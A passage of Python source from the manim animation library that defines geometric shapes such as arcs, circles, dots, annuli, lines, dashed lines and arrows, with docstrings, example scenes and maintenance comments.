        points[0::3] = samples[0:-1:2]
        points[1::3] = samples[1::2]
        points[2::3] = samples[2::2]
        return points

    def set_pre_positioned_points(self):
        # Anchors on the unit circle, cubic-Bezier style (Cairo renderer).
        anchors = np.array(
            [
                np.cos(a) * RIGHT + np.sin(a) * UP
                for a in np.linspace(
                    self.start_angle, self.start_angle + self.angle, self.num_components
                )
            ]
        )
        # Figure out which control points will give the
        # Appropriate tangent lines to the circle
        d_theta = self.angle / (self.num_components - 1.0)
        tangent_vectors = np.zeros(anchors.shape)
        # Rotate all 90 degrees, via (x, y) -> (-y, x)
        tangent_vectors[:, 1] = anchors[:, 0]
        tangent_vectors[:, 0] = -anchors[:, 1]
        # Use tangent vectors to deduce anchors
        handles1 = anchors[:-1] + (d_theta / 3) * tangent_vectors[:-1]
        handles2 = anchors[1:] - (d_theta / 3) * tangent_vectors[1:]
        self.set_anchors_and_handles(anchors[:-1], handles1, handles2, anchors[1:])

    def get_arc_center(self, warning=True):
        """
        Looks at the normals to the first two
        anchors, and finds their intersection points
        """
        # First two anchors and handles
        a1, h1, h2, a2 = self.get_points()[:4]
        if np.all(a1 == a2):
            # For a1 and a2 to lie at the same point arc radius
            # must be zero. Thus arc_center will also lie at
            # that point.
            return a1
        # Tangent vectors
        t1 = h1 - a1
        t2 = h2 - a2
        # Normals
        n1 = rotate_vector(t1, TAU / 4)
        n2 = rotate_vector(t2, TAU / 4)
        try:
            return line_intersection(line1=(a1, a1 + n1), line2=(a2, a2 + n2))
        except Exception:
            if warning:
                warnings.warn("Can't find Arc center, using ORIGIN instead")
            # Remember the failure so callers (e.g. ArcBetweenPoints) can
            # avoid trusting the returned ORIGIN.
            self._failed_to_get_center = True
            return np.array(ORIGIN)

    def move_arc_center_to(self, point):
        self.shift(point - self.get_arc_center())
        return self

    def stop_angle(self):
        # Angle (in [0, TAU)) of the arc's final point about its center.
        return angle_of_vector(self.get_points()[-1] - self.get_arc_center()) % TAU
class ArcBetweenPoints(Arc):
    """
    Inherits from Arc and additionally takes 2 points between which the arc is spanned.

    Example
    --------------------
    .. manim:: ArcBetweenPointsExample

        class ArcBetweenPointsExample(Scene):
            def construct(self):
                circle = Circle(radius=2, stroke_color=GREY)
                dot_1 = Dot(color=GREEN).move_to([2, 0, 0]).scale(0.5)
                dot_1_text = Tex("(2,0)").scale(0.5).next_to(dot_1, RIGHT).set_color(BLUE)
                dot_2 = Dot(color=GREEN).move_to([0, 2, 0]).scale(0.5)
                dot_2_text = Tex("(0,2)").scale(0.5).next_to(dot_2, UP).set_color(BLUE)
                arc= ArcBetweenPoints(start=2 * RIGHT, end=2 * UP, stroke_color=YELLOW)
                self.add(circle, dot_1, dot_2, dot_1_text, dot_2_text)
                self.play(Create(arc))
    """

    def __init__(self, start, end, angle=TAU / 4, radius=None, **kwargs):
        if radius is not None:
            self.radius = radius
            # A negative radius flips the arc to the other side of the chord.
            if radius < 0:
                sign = -2
                radius *= -1
            else:
                sign = 2
            halfdist = np.linalg.norm(np.array(start) - np.array(end)) / 2
            if radius < halfdist:
                raise ValueError(
                    """ArcBetweenPoints called with a radius that is
smaller than half the distance between the points."""
                )
            # Derive the subtended angle from radius and chord length.
            arc_height = radius - math.sqrt(radius ** 2 - halfdist ** 2)
            angle = math.acos((radius - arc_height) / radius) * sign
        Arc.__init__(self, radius=radius, angle=angle, **kwargs)
        if angle == 0:
            # Degenerate arc: fall back to a straight segment.
            self.set_points_as_corners([LEFT, RIGHT])
        self.put_start_and_end_on(start, end)
        if radius is None:
            # Radius wasn't given: recover it from the positioned arc.
            center = self.get_arc_center(warning=False)
            if not self._failed_to_get_center:
                self.radius = np.linalg.norm(np.array(start) - np.array(center))
            else:
                self.radius = math.inf
class CurvedArrow(ArcBetweenPoints):
    """An arrow shaped as a circular arc between two points.

    Accepts a ``tip_shape`` keyword selecting the tip class
    (default ``ArrowTriangleFilledTip``); all other kwargs are
    forwarded to :class:`ArcBetweenPoints`.
    """

    def __init__(self, start_point, end_point, **kwargs):
        # BUG FIX: pop tip_shape *before* forwarding kwargs. Previously it
        # was popped after super().__init__(**kwargs), so a user-supplied
        # tip_shape reached the mobject base classes and raised TypeError.
        tip_shape = kwargs.pop("tip_shape", ArrowTriangleFilledTip)
        super().__init__(start_point, end_point, **kwargs)
        self.add_tip(tip_shape=tip_shape)
class CurvedDoubleArrow(CurvedArrow):
    """A curved arrow with a tip at both ends.

    ``tip_shape_end`` styles the tip at the arc's end (forwarded to
    :class:`CurvedArrow` as ``tip_shape``); ``tip_shape_start`` styles
    the tip added at the arc's start.
    """

    def __init__(self, start_point, end_point, **kwargs):
        if "tip_shape_end" in kwargs:
            kwargs["tip_shape"] = kwargs.pop("tip_shape_end")
        tip_shape_start = kwargs.pop("tip_shape_start", ArrowTriangleFilledTip)
        super().__init__(start_point, end_point, **kwargs)
        self.add_tip(at_start=True, tip_shape=tip_shape_start)
class Circle(Arc):
    """A circle.

    Parameters
    ----------
    color : :class:`~.Colors`, optional
        The color of the shape.
    kwargs : Any
        Additional arguments to be passed to :class:`Arc`

    Examples
    --------
    .. manim:: CircleExample
        :save_last_frame:

        class CircleExample(Scene):
            def construct(self):
                circle_1 = Circle(radius=1.0)
                circle_2 = Circle(radius=1.5, color=GREEN)
                circle_3 = Circle(radius=1.0, color=BLUE_B, fill_opacity=1)
                circle_group = Group(circle_1, circle_2, circle_3).arrange(buff=1)
                self.add(circle_group)
    """

    def __init__(
        self,
        radius: float = None,
        color=RED,
        **kwargs,
    ):
        # A circle is a full-turn Arc; Arc handles radius=None.
        Arc.__init__(
            self,
            radius=radius,
            start_angle=0,
            angle=TAU,
            color=color,
            **kwargs,
        )

    def surround(self, mobject, dim_to_match=0, stretch=False, buffer_factor=1.2):
        """Modifies a circle so that it surrounds a given mobject.

        Parameters
        ----------
        mobject : :class:`~.Mobject`
            The mobject that the circle will be surrounding.
        dim_to_match : :class:`int`, optional
        buffer_factor : :class:`float`, optional
            Scales the circle with respect to the mobject. A `buffer_factor` < 1 makes the circle smaller than the mobject.
        stretch : :class:`bool`, optional
            Stretches the circle to fit more tightly around the mobject. Note: Does not work with :class:`Line`

        Examples
        --------
        .. manim:: CircleSurround
            :save_last_frame:

            class CircleSurround(Scene):
                def construct(self):
                    triangle1 = Triangle()
                    circle1 = Circle().surround(triangle1)
                    group1 = Group(triangle1,circle1) # treat the two mobjects as one
                    line2 = Line()
                    circle2 = Circle().surround(line2, buffer_factor=2.0)
                    group2 = Group(line2,circle2)
                    # buffer_factor < 1, so the circle is smaller than the square
                    square3 = Square()
                    circle3 = Circle().surround(square3, buffer_factor=0.5)
                    group3 = Group(square3, circle3)
                    group = Group(group1, group2, group3).arrange(buff=1)
                    self.add(group)
        """
        # Ignores dim_to_match and stretch; result will always be a circle
        # TODO: Perhaps create an ellipse class to handle single-dimension stretching
        # Something goes wrong here when surrounding lines?
        # TODO: Figure out and fix
        self.replace(mobject, dim_to_match, stretch)
        # Diameter = diagonal of the mobject's bounding box.
        self.width = np.sqrt(mobject.width ** 2 + mobject.height ** 2)
        return self.scale(buffer_factor)

    def point_at_angle(self, angle):
        """Returns the position of a point on the circle.

        Parameters
        ----------
        angle : class: `float`
            The angle of the point along the circle in radians.

        Returns
        -------
        :class:`numpy.ndarray`
            The location of the point along the circle's circumference.
        """
        # Offset by the circle's own start angle so `angle` is absolute.
        start_angle = angle_of_vector(self.get_points()[0] - self.get_center())
        return self.point_from_proportion((angle - start_angle) / TAU)
class Dot(Circle):
    """A circle with a very small radius.

    Parameters
    ----------
    point : Union[:class:`list`, :class:`numpy.ndarray`], optional
        The location of the dot.
    radius : Optional[:class:`float`]
        The radius of the dot.
    stroke_width : :class:`float`, optional
        The thickness of the outline of the dot.
    fill_opacity : :class:`float`, optional
        The opacity of the dot's fill_colour
    color : :class:`~.Colors`, optional
        The color of the dot.
    kwargs : Any
        Additional arguments to be passed to :class:`Circle`

    Examples
    --------
    .. manim:: DotExample
        :save_last_frame:

        class DotExample(Scene):
            def construct(self):
                dot1 = Dot(point=LEFT, radius=0.08)
                dot2 = Dot(point=ORIGIN)
                dot3 = Dot(point=RIGHT)
                self.add(dot1,dot2,dot3)
    """

    def __init__(
        self,
        point=ORIGIN,
        radius: float = DEFAULT_DOT_RADIUS,
        stroke_width=0,
        fill_opacity=1.0,
        color=WHITE,
        **kwargs,
    ):
        # A dot is a small filled circle centered at `point`.
        super().__init__(
            arc_center=point,
            radius=radius,
            stroke_width=stroke_width,
            fill_opacity=fill_opacity,
            color=color,
            **kwargs,
        )
class AnnotationDot(Dot):
    """
    A dot with bigger radius and bold stroke to annotate scenes.
    """

    def __init__(
        self,
        radius: float = DEFAULT_DOT_RADIUS * 1.3,
        stroke_width=5,
        stroke_color=WHITE,
        fill_color=BLUE,
        **kwargs,
    ):
        super().__init__(
            radius=radius,
            stroke_width=stroke_width,
            stroke_color=stroke_color,
            fill_color=fill_color,
            **kwargs,
        )
class LabeledDot(Dot):
    """A :class:`Dot` containing a label in its center.

    Parameters
    ----------
    label : Union[:class:`str`, :class:`~.SingleStringMathTex`, :class:`~.Text`, :class:`~.Tex`]
        The label of the :class:`Dot`. A plain :class:`str` is rendered as
        :class:`~.MathTex`; any pre-rendered string mobject (:class:`~.Text`,
        :class:`~.Tex`, ...) may be passed instead.
    radius : :class:`float`
        The radius of the :class:`Dot`. If ``None`` (the default), the radius
        is derived from the size of the ``label``.
    """

    def __init__(self, label, radius=None, **kwargs) -> None:
        # Plain strings become black MathTex so they stay readable on the fill.
        if isinstance(label, str):
            from manim import MathTex

            label_mobject = MathTex(label, color=BLACK)
        else:
            label_mobject = label
        if radius is None:
            # Pad the dot so the label fits with a small margin.
            label_extent = max(label_mobject.width, label_mobject.height)
            radius = 0.1 + label_extent / 2
        super().__init__(radius=radius, **kwargs)
        label_mobject.move_to(self.get_center())
        self.add(label_mobject)
class Ellipse(Circle):
    """A circular shape; oval, circle.

    Parameters
    ----------
    width : :class:`float`, optional
        The horizontal width of the ellipse.
    height : :class:`float`, optional
        The vertical height of the ellipse.
    kwargs : Any
        Additional arguments to be passed to :class:`Circle`

    Examples
    --------
    .. manim:: EllipseExample
        :save_last_frame:

        class EllipseExample(Scene):
            def construct(self):
                ellipse_1 = Ellipse(width=2.0, height=4.0, color=BLUE_B)
                ellipse_2 = Ellipse(width=4.0, height=1.0, color=BLUE_D)
                ellipse_group = Group(ellipse_1,ellipse_2).arrange(buff=1)
                self.add(ellipse_group)
    """

    def __init__(self, width=2, height=1, **kwargs):
        super().__init__(**kwargs)
        # Build a unit circle, then stretch it to the requested dimensions.
        self.stretch_to_fit_width(width)
        self.stretch_to_fit_height(height)
class AnnularSector(Arc):
    """A sector of an annulus (ring segment).

    Parameters
    ----------
    inner_radius
        The inside radius of the Annular Sector.
    outer_radius
        The outside radius of the Annular Sector.
    angle
        The clockwise angle of the Annular Sector.
    start_angle
        The starting clockwise angle of the Annular Sector.
    fill_opacity
        The opacity of the color filled in the Annular Sector.
    stroke_width
        The stroke width of the Annular Sector.
    color
        The color filled into the Annular Sector.

    Examples
    --------
    .. manim:: AnnularSectorExample
        :save_last_frame:

        class AnnularSectorExample(Scene):
            def construct(self):
                # Changes background color to clearly visualize changes in fill_opacity.
                self.camera.background_color = WHITE
                # The default parameter start_angle is 0, so the AnnularSector starts from the +x-axis.
                s1 = AnnularSector(color=YELLOW).move_to(2 * UL)
                # Different inner_radius and outer_radius than the default.
                s2 = AnnularSector(inner_radius=1.5, outer_radius=2, angle=45 * DEGREES, color=RED).move_to(2 * UR)
                # fill_opacity is typically a number > 0 and <= 1. If fill_opacity=0, the AnnularSector is transparent.
                s3 = AnnularSector(inner_radius=1, outer_radius=1.5, angle=PI, fill_opacity=0.25, color=BLUE).move_to(2 * DL)
                # With a negative value for the angle, the AnnularSector is drawn clockwise from the start value.
                s4 = AnnularSector(inner_radius=1, outer_radius=1.5, angle=-3 * PI / 2, color=GREEN).move_to(2 * DR)
                self.add(s1, s2, s3, s4)
    """

    def __init__(
        self,
        inner_radius=1,
        outer_radius=2,
        angle=TAU / 4,
        start_angle=0,
        fill_opacity=1,
        stroke_width=0,
        color=WHITE,
        **kwargs,
    ):
        self.inner_radius = inner_radius
        self.outer_radius = outer_radius
        super().__init__(
            start_angle=start_angle,
            angle=angle,
            fill_opacity=fill_opacity,
            stroke_width=stroke_width,
            color=color,
            **kwargs,
        )

    def generate_points(self):
        # Trace the inner arc forward, the outer arc backward, and join them
        # with straight radial segments so the region closes.
        inner_arc, outer_arc = [
            Arc(
                start_angle=self.start_angle,
                angle=self.angle,
                radius=radius,
                arc_center=self.arc_center,
            )
            for radius in (self.inner_radius, self.outer_radius)
        ]
        outer_arc.reverse_points()
        self.append_points(inner_arc.get_points())
        self.add_line_to(outer_arc.get_points()[0])
        self.append_points(outer_arc.get_points())
        self.add_line_to(inner_arc.get_points()[0])

    # OpenGL renderer uses init_points; same construction applies.
    init_points = generate_points
class Sector(AnnularSector):
    """A sector of a circle: an :class:`AnnularSector` whose inner radius defaults to 0.

    Examples
    --------
    .. manim:: ExampleSector
        :save_last_frame:

        class ExampleSector(Scene):
            def construct(self):
                sector = Sector(outer_radius=2, inner_radius=1)
                sector2 = Sector(outer_radius=2.5, inner_radius=0.8).move_to([-3, 0, 0])
                sector.set_color(RED)
                sector2.set_color(PINK)
                self.add(sector, sector2)
    """

    def __init__(self, outer_radius=1, inner_radius=0, **kwargs):
        super().__init__(inner_radius=inner_radius, outer_radius=outer_radius, **kwargs)
class Annulus(Circle):
    """Region between two concentric :class:`Circles <.Circle>`.

    Parameters
    ----------
    inner_radius
        The radius of the inner :class:`Circle`.
    outer_radius
        The radius of the outer :class:`Circle`.
    kwargs : Any
        Additional arguments to be passed to :class:`Annulus`

    Examples
    --------
    .. manim:: AnnulusExample
        :save_last_frame:

        class AnnulusExample(Scene):
            def construct(self):
                annulus_1 = Annulus(inner_radius=0.5, outer_radius=1).shift(UP)
                annulus_2 = Annulus(inner_radius=0.3, outer_radius=0.6, color=RED).next_to(annulus_1, DOWN)
                self.add(annulus_1, annulus_2)
    """

    def __init__(
        self,
        inner_radius: Optional[float] = 1,
        outer_radius: Optional[float] = 2,
        fill_opacity=1,
        stroke_width=0,
        color=WHITE,
        mark_paths_closed=False,
        **kwargs,
    ):
        self.mark_paths_closed = mark_paths_closed  # is this even used?
        self.inner_radius = inner_radius
        self.outer_radius = outer_radius
        super().__init__(
            fill_opacity=fill_opacity, stroke_width=stroke_width, color=color, **kwargs
        )

    def generate_points(self):
        self.radius = self.outer_radius
        outer_circle = Circle(radius=self.outer_radius)
        inner_circle = Circle(radius=self.inner_radius)
        # Reversing the inner circle makes it wind the other way, so the
        # fill rule leaves a hole in the middle.
        inner_circle.reverse_points()
        self.append_points(outer_circle.get_points())
        self.append_points(inner_circle.get_points())
        self.shift(self.arc_center)

    # OpenGL renderer uses init_points; same construction applies.
    init_points = generate_points
class Line(TipableVMobject):
    """A straight (or, with ``path_arc``, arced) segment between two points or mobjects."""

    def __init__(self, start=LEFT, end=RIGHT, buff=0, path_arc=None, **kwargs):
        self.dim = 3
        self.buff = buff
        self.path_arc = path_arc
        # Resolves mobject endpoints to boundary points (see pointify).
        self.set_start_and_end_attrs(start, end)
        super().__init__(**kwargs)

    def generate_points(self):
        self.set_points_by_ends(
            start=self.start, end=self.end, buff=self.buff, path_arc=self.path_arc
        )

    def set_points_by_ends(self, start, end, buff=0, path_arc=0):
        if path_arc:
            # NOTE(review): the arc branch uses self.start/self.end and
            # self.path_arc instead of the start/end/path_arc parameters —
            # confirm this is intentional before relying on the parameters.
            arc = ArcBetweenPoints(self.start, self.end, angle=self.path_arc)
            self.set_points(arc.get_points())
        else:
            self.set_points_as_corners([start, end])
        self.account_for_buff(buff)

    # OpenGL renderer uses init_points; same construction applies.
    init_points = generate_points

    def set_path_arc(self, new_value):
        self.path_arc = new_value
        self.init_points()

    def account_for_buff(self, buff):
        # Trim `buff` length off both ends by keeping the middle portion.
        if buff == 0:
            return
        #
        if self.path_arc == 0:
            length = self.get_length()
        else:
            length = self.get_arc_length()
        #
        if length < 2 * buff:
            # Line shorter than the combined buffers: leave it untouched.
            return
        buff_proportion = buff / length
        self.pointwise_become_partial(self, buff_proportion, 1 - buff_proportion)
        return self

    def set_start_and_end_attrs(self, start, end):
        # If either start or end are Mobjects, this
        # gives their centers
        rough_start = self.pointify(start)
        rough_end = self.pointify(end)
        vect = normalize(rough_end - rough_start)
        # Now that we know the direction between them,
        # we can find the appropriate boundary point from
        # start and end, if they're mobjects
        self.start = self.pointify(start, vect)
        self.end = self.pointify(end, -vect)

    def pointify(self, mob_or_point, direction=None):
        # Mobject -> its center (or boundary point toward `direction`);
        # raw coordinates -> ndarray.
        if isinstance(mob_or_point, (Mobject, OpenGLMobject)):
            mob = mob_or_point
            if direction is None:
                return mob.get_center()
            else:
                return mob.get_boundary_point(direction)
        return np.array(mob_or_point)

    def put_start_and_end_on(self, start: Sequence[float], end: Sequence[float]):
        """Sets starts and end coordinates of a line.

        Examples
        --------
        .. manim:: LineExample

            class LineExample(Scene):
                def construct(self):
                    d = VGroup()
                    for i in range(0,10):
                        d.add(Dot())
                    d.arrange_in_grid(buff=1)
                    self.add(d)
                    l= Line(d[0], d[1])
                    self.add(l)
                    self.wait()
                    l.put_start_and_end_on(d[1].get_center(), d[2].get_center())
                    self.wait()
                    l.put_start_and_end_on(d[4].get_center(), d[7].get_center())
                    self.wait()
        """
        curr_start, curr_end = self.get_start_and_end()
        if np.all(curr_start == curr_end):
            # TODO, any problems with resetting
            # these attrs?
            self.start = start
            self.end = end
            self.generate_points()
        return super().put_start_and_end_on(start, end)

    def get_vector(self):
        return self.get_end() - self.get_start()

    def get_unit_vector(self):
        return normalize(self.get_vector())

    def get_angle(self):
        return angle_of_vector(self.get_vector())

    def get_projection(self, point: Sequence[float]) -> Sequence[float]:
        """Returns the projection of a point onto a line.

        Parameters
        ----------
        point
            The point to which the line is projected.
        """
        start = self.get_start()
        end = self.get_end()
        unit_vect = normalize(end - start)
        return start + np.dot(point - start, unit_vect) * unit_vect

    def get_slope(self):
        return np.tan(self.get_angle())

    def set_angle(self, angle, about_point=None):
        # Rotate the line about `about_point` (default: its start) so it
        # makes the given absolute angle.
        if about_point is None:
            about_point = self.get_start()
        self.rotate(
            angle - self.get_angle(),
            about_point=about_point,
        )
        return self

    def set_length(self, length):
        return self.scale(length / self.get_length())

    def set_opacity(self, opacity, family=True):
        # Overwrite default, which would set
        # the fill opacity
        self.set_stroke(opacity=opacity)
        if family:
            for sm in self.submobjects:
                sm.set_opacity(opacity, family)
        return self
class DashedLine(Line):
    """A dashed :class:`Line`.

    Parameters
    ----------
    args : Any
        Arguments to be passed to :class:`Line`
    dash_length : :class:`float`, optional
        The length of each individual dash of the line.
    dash_spacing : Optional[:class:`float`]
        The spacing between the dashes.
    positive_space_ratio : :class:`float`, optional
        The ratio of empty space to dash space. Range of 0-1.
    kwargs : Any
        Additional arguments to be passed to :class:`Line`

    Examples
    --------
    .. manim:: DashedLineExample
        :save_last_frame:

        class DashedLineExample(Scene):
            def construct(self):
                # dash_length increased
                dashed_1 = DashedLine(config.left_side, config.right_side, dash_length=2.0).shift(UP*2)
                # normal
                dashed_2 = DashedLine(config.left_side, config.right_side)
                # positive_space_ratio decreased
                dashed_3 = DashedLine(config.left_side, config.right_side, positive_space_ratio=0.1).shift(DOWN*2)
                self.add(dashed_1, dashed_2, dashed_3)

    See Also
    --------
    :class:`~.DashedVMobject`
    """

    def __init__(
        self,
        *args,
        dash_length=DEFAULT_DASH_LENGTH,
        dash_spacing=None,
        positive_space_ratio=0.5,
        **kwargs,
    ):
        self.dash_length = dash_length
        # BUG FIX: previously `self.dash_spacing = (dash_spacing,)` — a stray
        # trailing comma stored a 1-tuple, which breaks the float arithmetic
        # in calculate_positive_space_ratio.
        self.dash_spacing = dash_spacing
        self.positive_space_ratio = positive_space_ratio
        super().__init__(*args, **kwargs)
        # Replace the solid line's points with a group of dash submobjects.
        dashes = DashedVMobject(
            self,
            num_dashes=self.calculate_num_dashes(),
            positive_space_ratio=positive_space_ratio,
        )
        self.clear_points()
        self.add(*dashes)

    def calculate_num_dashes(self) -> int:
        """Returns the number of dashes in the dashed line.

        Examples
        --------
        ::

            >>> DashedLine().calculate_num_dashes()
            20
        """
        # Each dash "owns" dash_length / positive_space_ratio of the line.
        try:
            full_length = self.dash_length / self.positive_space_ratio
            return int(np.ceil(self.get_length() / full_length))
        except ZeroDivisionError:
            return 1

    def calculate_positive_space_ratio(self):
        # Only meaningful when dash_spacing was given as a number.
        return fdiv(self.dash_length, self.dash_length + self.dash_spacing)

    def get_start(self) -> np.ndarray:
        """Returns the start point of the line.

        Examples
        --------
        ::

            >>> DashedLine().get_start()
            array([-1.,  0.,  0.])
        """
        # Delegate to the first dash when dashes exist.
        if len(self.submobjects) > 0:
            return self.submobjects[0].get_start()
        else:
            return Line.get_start(self)

    def get_end(self) -> np.ndarray:
        """Returns the end point of the line.

        Examples
        --------
        ::

            >>> DashedLine().get_end()
            array([0.99871795, 0.        , 0.        ])
        """
        if len(self.submobjects) > 0:
            return self.submobjects[-1].get_end()
        else:
            return super().get_end()

    def get_first_handle(self) -> np.ndarray:
        """Returns the point of the first handle.

        Examples
        --------
        ::

            >>> DashedLine().get_first_handle()
            array([-0.98333333,  0.        ,  0.        ])
        """
        return self.submobjects[0].get_points()[1]

    def get_last_handle(self) -> np.ndarray:
        """Returns the point of the last handle.

        Examples
        --------
        ::

            >>> DashedLine().get_last_handle()
            array([0.98205128, 0.        , 0.        ])
        """
        return self.submobjects[-1].get_points()[-2]
class TangentLine(Line):
    """A line tangent to a :class:`~.VMobject` at a given proportion.

    Parameters
    ----------
    vmob : :class:`~.VMobject`
        The VMobject on which the tangent line is drawn.
    alpha : :class:`float`
        How far along the shape the line is constructed. Range: 0-1.
    length : :class:`float`, optional
        Length of the tangent line.
    d_alpha : :class:`float`, optional
        The ``dx`` used for the finite-difference approximation.
    kwargs : Any
        Additional arguments to be passed to :class:`Line`.

    Examples
    --------
    .. manim:: TangentLineExample
        :save_last_frame:

        class TangentLineExample(Scene):
            def construct(self):
                circle = Circle(radius=2)
                line_1 = TangentLine(circle, alpha=0.0, length=4, color=BLUE_D) # right
                line_2 = TangentLine(circle, alpha=0.4, length=4, color=GREEN) # top left
                self.add(circle, line_1, line_2)

    See Also
    --------
    :meth:`~.VMobject.point_from_proportion`
    """

    def __init__(self, vmob, alpha, length=1, d_alpha=1e-6, **kwargs):
        self.length = length
        self.d_alpha = d_alpha
        # Sample the curve slightly before and after ``alpha`` and draw the
        # secant through those samples; for small d_alpha this approximates
        # the tangent direction.
        lower = np.clip(alpha - d_alpha, 0, 1)
        upper = np.clip(alpha + d_alpha, 0, 1)
        super().__init__(
            vmob.point_from_proportion(lower),
            vmob.point_from_proportion(upper),
            **kwargs,
        )
        # The secant is tiny; stretch it to the requested length.
        self.scale(self.length / self.get_length())
class Elbow(VMobject, metaclass=ConvertToOpenGL):
    """Two segments meeting at a right angle: an L-shape.

    Parameters
    ----------
    width : :class:`float`, optional
        The length of the elbow's sides.
    angle : :class:`float`, optional
        The rotation of the elbow.
    kwargs : Any
        Additional arguments to be passed to :class:`~.VMobject`.

    Examples
    --------
    .. manim:: ElbowExample
        :save_last_frame:

        class ElbowExample(Scene):
            def construct(self):
                elbow_1 = Elbow()
                elbow_2 = Elbow(width=2.0)
                elbow_3 = Elbow(width=2.0, angle=5*PI/4)
                elbow_group = Group(elbow_1, elbow_2, elbow_3).arrange(buff=1)
                self.add(elbow_group)

    See Also
    --------
    :class:`RightAngle`
    """

    def __init__(self, width=0.2, angle=0, **kwargs):
        self.angle = angle
        super().__init__(**kwargs)
        # The elbow is the corner path UP -> UP+RIGHT -> RIGHT, then scaled
        # to the requested width and rotated about the origin.
        corner_path = [UP, UP + RIGHT, RIGHT]
        self.set_points_as_corners(corner_path)
        self.scale_to_fit_width(width, about_point=ORIGIN)
        self.rotate(self.angle, about_point=ORIGIN)
class Arrow(Line):
    """An arrow.

    Parameters
    ----------
    args : Any
        Arguments to be passed to :class:`Line`.
    stroke_width : :class:`float`, optional
        The thickness of the arrow. Influenced by :attr:`max_stroke_width_to_length_ratio`.
    buff : :class:`float`, optional
        The distance of the arrow from its start and end points.
    max_tip_length_to_length_ratio : :class:`float`, optional
        :attr:`tip_length` scales with the length of the arrow. Increasing this ratio raises the max value of :attr:`tip_length`.
    max_stroke_width_to_length_ratio : :class:`float`, optional
        :attr:`stroke_width` scales with the length of the arrow. Increasing this ratio raises the max value of :attr:`stroke_width`.
    kwargs : Any
        Additional arguments to be passed to :class:`Line`.

    Examples
    --------
    .. manim:: ArrowExample
        :save_last_frame:

        from manim.mobject.geometry import ArrowSquareTip

        class ArrowExample(Scene):
            def construct(self):
                arrow_1 = Arrow(start=RIGHT, end=LEFT, color=GOLD)
                arrow_2 = Arrow(start=RIGHT, end=LEFT, color=GOLD, tip_shape=ArrowSquareTip).shift(DOWN)
                g1 = Group(arrow_1, arrow_2)

                # the effect of buff
                square = Square(color=MAROON_A)
                arrow_3 = Arrow(start=LEFT, end=RIGHT)
                arrow_4 = Arrow(start=LEFT, end=RIGHT, buff=0).next_to(arrow_1, UP)
                g2 = Group(arrow_3, arrow_4, square)

                # a shorter arrow has a shorter tip and smaller stroke width
                arrow_5 = Arrow(start=ORIGIN, end=config.top).shift(LEFT * 4)
                arrow_6 = Arrow(start=config.top + DOWN, end=config.top).shift(LEFT * 3)
                g3 = Group(arrow_5, arrow_6)

                self.add(Group(g1, g2, g3).arrange(buff=2))

    .. manim:: ArrowExample
        :save_last_frame:

        class ArrowExample(Scene):
            def construct(self):
                left_group = VGroup()
                # As buff increases, the size of the arrow decreases.
                for buff in np.arange(0, 2.2, 0.45):
                    left_group += Arrow(buff=buff, start=2 * LEFT, end=2 * RIGHT)
                # Required to arrange arrows.
                left_group.arrange(DOWN)
                left_group.move_to(4 * LEFT)

                middle_group = VGroup()
                # As max_stroke_width_to_length_ratio gets bigger,
                # the width of stroke increases.
                for i in np.arange(0, 5, 0.5):
                    middle_group += Arrow(max_stroke_width_to_length_ratio=i)
                middle_group.arrange(DOWN)

                UR_group = VGroup()
                # As max_tip_length_to_length_ratio increases,
                # the length of the tip increases.
                for i in np.arange(0, 0.3, 0.1):
                    UR_group += Arrow(max_tip_length_to_length_ratio=i)
                UR_group.arrange(DOWN)
                UR_group.move_to(4 * RIGHT + 2 * UP)

                DR_group = VGroup()
                DR_group += Arrow(start=LEFT, end=RIGHT, color=BLUE, tip_shape=ArrowSquareTip)
                DR_group += Arrow(start=LEFT, end=RIGHT, color=BLUE, tip_shape=ArrowSquareFilledTip)
                DR_group += Arrow(start=LEFT, end=RIGHT, color=YELLOW, tip_shape=ArrowCircleTip)
                DR_group += Arrow(start=LEFT, end=RIGHT, color=YELLOW, tip_shape=ArrowCircleFilledTip)
                DR_group.arrange(DOWN)
                DR_group.move_to(4 * RIGHT + 2 * DOWN)

                self.add(left_group, middle_group, UR_group, DR_group)

    See Also
    --------
    :class:`ArrowTip`
    :class:`CurvedArrow`
    """

    def __init__(
        self,
        *args,
        stroke_width=6,
        buff=MED_SMALL_BUFF,
        max_tip_length_to_length_ratio=0.25,
        max_stroke_width_to_length_ratio=5,
        **kwargs,
    ):
        self.max_tip_length_to_length_ratio = max_tip_length_to_length_ratio
        self.max_stroke_width_to_length_ratio = max_stroke_width_to_length_ratio
        # ``tip_shape`` is popped before Line.__init__ so Line never sees it.
        tip_shape = kwargs.pop("tip_shape", ArrowTriangleFilledTip)
        super().__init__(*args, buff=buff, stroke_width=stroke_width, **kwargs)
        # TODO, should this be affected when
        # Arrow.set_stroke is called?
        self.initial_stroke_width = self.stroke_width
        self.add_tip(tip_shape=tip_shape)
        self.set_stroke_width_from_length()

    def scale(self, factor, scale_tips=False, **kwargs):
        r"""Scale an arrow, but keep stroke width and arrow tip size fixed.

        See Also
        --------
        :meth:`~.Mobject.scale`

        Examples
        --------
        ::

            >>> arrow = Arrow(np.array([-1, -1, 0]), np.array([1, 1, 0]), buff=0)
            >>> scaled_arrow = arrow.scale(2)
            >>> np.round(scaled_arrow.get_start_and_end(), 8) + 0
            array([[-2., -2.,  0.],
                   [ 2.,  2.,  0.]])
            >>> arrow.tip.length == scaled_arrow.tip.length
            True

        Manually scaling the object using the default method
        :meth:`~.Mobject.scale` does not have the same properties::

            >>> new_arrow = Arrow(np.array([-1, -1, 0]), np.array([1, 1, 0]), buff=0)
            >>> another_scaled_arrow = VMobject.scale(new_arrow, 2)
            >>> another_scaled_arrow.tip.length == arrow.tip.length
            False
        """
        # A zero-length arrow cannot be scaled meaningfully (and would break
        # the stroke-width recomputation below).
        if self.get_length() == 0:
            return self

        if scale_tips:
            # Tips scale along with the body; only re-derive the stroke width.
            super().scale(factor, **kwargs)
            self.set_stroke_width_from_length()
            return self

        # Remove tips before scaling so they keep their original size, then
        # reattach them afterwards.
        has_tip = self.has_tip()
        has_start_tip = self.has_start_tip()
        if has_tip or has_start_tip:
            old_tips = self.pop_tips()

        super().scale(factor, **kwargs)
        self.set_stroke_width_from_length()

        # pop_tips() yields the end tip first, then the start tip.
        if has_tip:
            self.add_tip(tip=old_tips[0])
        if has_start_tip:
            self.add_tip(tip=old_tips[1], at_start=True)
        return self

    def get_normal_vector(self) -> np.ndarray:
        """Returns the normal of a vector.

        Examples
        --------
        ::

            >>> np.round(Arrow().get_normal_vector()) + 0. # add 0. to avoid negative 0 in output
            array([ 0.,  0., -1.])
        """
        # Use the first three anchors of the tip to span the arrow's plane.
        p0, p1, p2 = self.tip.get_start_anchors()[:3]
        return normalize(np.cross(p2 - p1, p1 - p0))

